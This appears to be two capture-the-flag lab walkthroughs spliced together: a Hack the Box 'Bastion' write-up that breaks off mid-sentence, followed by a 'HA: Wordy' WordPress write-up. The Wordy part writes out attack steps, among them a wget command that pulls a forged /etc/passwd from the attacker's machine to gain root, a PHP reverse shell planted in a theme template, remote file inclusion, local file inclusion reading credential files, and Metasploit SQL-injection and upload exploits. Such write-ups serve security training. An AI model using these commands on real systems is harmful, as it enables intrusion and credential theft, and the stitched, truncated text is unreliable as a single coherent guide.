Today we are going to solve another CTF
challenge called “Baniston” which is categorized as a retired lab developed by
Hack the Box for the purpose of online penetration practices. Solving this lab
is not that tough if have proper basic knowledge of Penetration testing. Let’s
start and learn how to breach it.
Level: Intermediate
Task: find user.txt and root.txt file on
the victim’s machine.
Since these labs are online, therefore they
have static IP. The IP of Baiston is 10.10.10.134 so let’s start with nmap port
enumeration.
From the given image below, we can observe
that we found ports 22, 135, 139, 445 are open. This means the services like
ssh, msrpc, smb etc are running in the victim’s network.
nmap -A 10.10. 10.134
As we can clearly note form the nmap scan
that we have the SMB service running, and we don’t have any credentials for the
ssh so we went directly on SMB. We logged in using the command mentioned. There
is list of shared directories. We tried bunch of them but only Backups seems to
be accessible. We enumerated that directory. We find a notes.txt, a temp file,
and a directory named WindowsImageBackup. Let’s transfer the notes.txt file on
our machine to read its contents.
smbclient -L //10.10.10.134
smbclient //10.10.10.134/Backups
smb: \> ls
smb: \> get note.txt
After transferring the file, we went back
on our kali shell and read the file using the cat command.
cat note.txt
It contained the message that might be a
hint. Let’s keep it in mind and enumerate further.
“Sysadmins: please don't transfer the
entire backup file locally, the VPN to the subsidiary office is too slow.”
We went back to the smb, in order to look
at the directory we found earlier. It contained another directory with the name
of the system, L4mpje, we went into that directory as well to find a Backup
directory. Here we found some vhd images. On a close inspection we found that
these are system backup files.
smbclient //10.10.10.134/Backups
smb: \> cd WindowslmageBackup
smb: \WindowslmageBackup\> ls
smb: \WindowslmageBackup\> cd
L4mpje-PC
smb: WindowsImageBackup\L4mpje-PC\>
ls
smb: \WindowslmageBackup\L4mpje-PC\>
cd "Backup 2019-02-22 124351"
smb:
\WindowslmageBackup\L4mpje-PC\Backup 2019-02-22 124351\> ls
The note said that trying to download them
will take a very long time, we decided that mounting them is the way to go. To
do this we are going to create these directories as shown in the image.
mkdir /mnt/L4mpje-PC
mkdir /mnt/vhd
Now for the mounting of those backups we
are going to use the CIFS protocol followed by the path of the backup folder,
with an anonymous user.
mount -t cifs
//10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC /mnt/L4mpje-PC/ -o
user=anonymous
Now using the qemu-nbd we will mount the
specific vhd backup file. After mounting we went into the vhd directory to see
the files that the backup contained.
We enumerated around for a while and
finally we went into the System32 directory to find a config directory. Here we
found the SAM and the SYSTEM file.
cd Windows/System32/config
ls -la
Now we have to extract the credentials from
these two files. To do that we are going to use samdump script. After running,
we got the following the following hashes. Two of these users are disabled.
We cracked the hash online to find the
password for the user L4mpje to be bureaulampje.
Now we will login into the lab using the
ssh while using the username l4mpje and the password bureaulampje. After
logging in we traversed to the Desktop of the user to read the user.txt flag
Now it’s time to escalate privileges on the
lab. We enumerated the user directory to look into the AppData directory. Here
inside the Roaming directory we saw that mRemoteNG is installed on the machine.
We got some xml files inside it. We tried to opened them using the type command
to find an encode password.
Now, we headed to Google to find any way to
decrypt this encoded text, we found this mRemoteNG-Decrypt script for
decrypting our password. We cloned the git to our system and ran the python
script with the encoded text as a parameter. The password came out to be:
This is our
Walkthrough for HA: Wordy” and this CTF is design by Hacking Articles Team 😊, hope you will enjoy.
The lab is
designed for Beginners for WordPress Penetration Testing Practices. This lab is
designed as a Capture the flag and not as a boot to root, but it contains
multiple Vulnerabilities (OWASP Top-10) that should be exploited to complete
this CTF Challenge. This helps the CTF player to understand all the ways in
which a WordPress machine can be vulnerable.
Starting with
netdiscover, to identify host IP address and thus we found 192.168.0.27. let’s
now go for advance network scanning using nmap aggressive scan.
nmap -A
192.168.0.27
We saw from the
scan result that the port 80 open which is hosting Apache httpd service.
This gave us a
directory called “wordpress” as shown in the given image.
Upon finding the
directory, we opened the URL in our browser.
Now that we have
the wordpress site, it’s logical to perform a wpscan on our lab.
wpscan --url
http://192.168.0.27/wordpress --enumerate p
Now we move
further down in the wpscan result and found the reflex gallery plugin. It is
vulnerable to the File Upload. As you can observe that it has shown Metasploit
module for exploiting reflex gallery.
As soon as we
gained the proper shell, we enumerated the machine for flags. We found
flag1.txt in the /home/raj/ directory
cd /home
ls
cd raj
ls
cat flag1.tx
Now for
privilege escalation It is a regular practice to check for any file having SUID
permissions with the help of “Find” command. We used the following
command to enumerate all binaries having SUID permissions:
find / -perm
-u=s -type f 2>/dev/null
Find command shown
that wget and cp command have the SUID permissions. This could be
a possible for escalating root privilege.
SUID Binaries
command gave us all the sensitive files that can be read/write and hence with
the help of wget command we can overwrite the /etc/passwd.
“To know more
how to edit /etc/passwd file read Full-Article from article1
& article2”.
Now we are
creating the salt value of password for our new user and this will be done by
using “openssl” following command as mentioned in the screenshot below:
openssl
passwd -1 -salt ignite pass123
And we will get
our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; This
is going to help us create an entry of our user in the /etc/passwd file of the
target machine. Now we have copied the entire content of /etc/passwd file as
shown in the below image in our local machine.
cd /home/raj
cat
/etc/passwd
After pasting
above copied content, we will edit a new record for the user “ignite” then
paste the above-copied hash password in the record as shown below.
cat
/etc/passwd
Now we want to overwrite
passwd file inside /etc folder to replace the original passwd file. We can use
wget with -O to download the passwd file from our machine inside a /etc
directory which will overwrite the existing passwd file.
cd /home/raj
cd /etc
wget -O
passwd http://192.168.0.16:8000/passwd
Now when you
check, you will see that the / etc / passwd file has been updated as shown in
the image below.
tail
/etc/passwd
Now let’s try to
access root shell and we have to switch user as ignite for escalating
privileges.
su ignite
cd /root
ls
cat proof.txt
Awesome!! We
found the final flag along with root privileges. Let’s go for 2nd
method……..
We can solve the
lab using another method as well. Earlier our Wpscan showed us the Mail Masta
plugin which is vulnerable to LFI (Local File Inclusion). On exploring the
following link, we got
proof-of-concept would be to load passwd file.
Now we browsed
the URL in our browser to find the output of cat command on /etc/passwd file.
Now after some
enumeration, we found that there are some credentials stored inside the
/etc/apache2/.htpasswd. So, let’s read them using curl while exploiting LFI.
We were
successful in obtaining a hash. It seemed like Base64 Encryption. We used the
base64 command with -d parameter to decode this hash as shown in the image.
echo
“YWFydGk6YWFydGlAZ21haWwuY29t” | base64 -d
It turned out to
be aarti:aarti@gmail.com. This must be login details but there is no password.
Aarti is a member
of wordpress and server user account. We can confirm this from our previous
assessment of wpscan result. It shows 2 users admin and aarti.
CSRF:WP
Support Plus Responsive Ticket
When we scanned
wordpress with wpscan for vulnerable plugins, we found many of them and here,
one by one we can exploit them to our desire. To do so, we will use
searchsploit in order to find exploits for wp support as this was hinted
to us during the said scan. Therefore, type the following for this:
searchsploit
wp-support
searchsploit
-m 41006
cat 41006.txt
Once the above
commands are executed, we will now copy the highlighted content and modify it (as
shown in the image below) to change username value to “aarti” and email
value to “aarti@gmail.com” :
Username:
As we execute
the above script, the webpage will be directed to the log in screen; asking us
the username, which we have already found.
Here, as soon as
we click on login button, we will be logged in as a user without entering
password because of incorrect usage of wp_set_auth_cookie() due to CSRF
vulnerability.
While traversing
the website we found a second flag and a root password in biographical
info.
The password we
found was encoded using base64 algorithm. To decrypt the password, we used the
following command :
echo
“SWduaXRlQDEyMw==”|base64 -d
Upon decryption
we found the root password is Ignite@123. This is the password for the admin
user in Wordpress.
Now, to proceed
further we used the php reverse shell. We changed the IP Address to our current
IP Address and give any port you want and start netcat listener for obtaining
reverse connection.
And then we
copied the above php-reverse-shell and paste it in 404.php template of
wordpress as shown in the image below :
Then after
saving the 404.php file we will run the file through URL in a browser as shown
in the image below :
Simultaneously,
when you run netcat, you will have your session upon execution of 404.php file.
Access netcat using the following command :
To further
enumerate, we performed a Directory Bruteforce. There are a lot of situations
where we need to extract the directories with specific extension over the
target server, and for this we can use the -X parameter in dirb scan. This
parameter accepts the file extension name and then searches the given extension
files over the target server or machine. For instance, here we need to find
text files, so we will use the following command for it :
dirb
http://192.168.0.27-X .txt
Among all the
text files the message in notes.txt stood out. It said, “you need to zip your
way out” and this message is obviously a hint to look for a zip file.
Now, again we
will use dirb -X extension to find zip.
dirb
http://192.168.0.27 -X .zip
Upon finding a
zip file and then we download the file using the following wget and then unzip
the command:
wget
http://192.168.0.27/secret.zip
unzip
secret.zip
To unzip the
file successfully, you will need a password because it was a password protected
zip file, but as we don’t know the said password, we will try to exploit a
plugin.
We will use
WordPress plugin wp-symposium version 15.5.1 which allows to retrieve
all the database content, which includes users’ details and password.
Luckily, we
found exploit for this vulnerability inside Metasploit framework and thus load
the below module and execute following command
use
auxiliary/admin/http/wp_symposium_sql_injection
msf
auxiliary(wp_symposium_sql_injection) > set rhosts 192.168.0.27
msf
auxiliary(wp_symposium_sql_injection) > set targeturi /wordpress
Nice!!! Here we
found the relevant username and email id as user: admin and aarti respectively.
Now will unzip
the file we found earlier that is secret.zip with hash we found in wp-symposium
exploit.
cat link.txt
As soon as we
unzip the file, we found that this lab can be solved with multiple ways with
the list of exploits.
Exploit Gwolle Guestbook (4th
Method: RFI)
Now again we
will run wpscan to enumerate the themes and plugins and find a vulnerable
plugin called “Gwolle Guestbook”. We search for the exploit and find that it is
vulnerable to Remote File Inclusion (RFI).
We will follow
the instructions according to the given POC on exploit-db and use the
php-reverse-shell.php available on Kali Linux. We will copy it to desktop and
rename it to wp-load.php. To execute our php shell using RFI we will start
our python HTTP server to exploit RFI on the target machine.
mv
php-reverse-shell.php shell.phpwp-load.php
python -m
SimpleHTTPServer
We set up our
listener using netcat; as soon as we execute our php shell through RFI, we are
successfully able to get a reverse shell.
Now we will
exploit another vulnerable plugin that we found in secret.zip. The WordPress
SlideShow Gallery plugin contains an authenticated file upload vulnerability.
An attacker can upload arbitrary files to the upload folder. Since the plugin
uses its own file upload mechanism instead of the WordPress API, it’s possible
to upload any file type.
Metasploit
You will get
exploit for this vulnerability inside Metasploit framework and thus load the
below module and execute following command:
use
exploit/unix/webapp/wp_slideshowgallery_upload
set targeturi
/wordpress
set rhosts
192.168.0.27
set wp_user
admin
set
wp_password Ignite@123
exploit
As the above
commands are executed, you will have your meterpreter session. Just as
portrayed in this article, there are multiple methods to exploit a wordpress
platformed website.
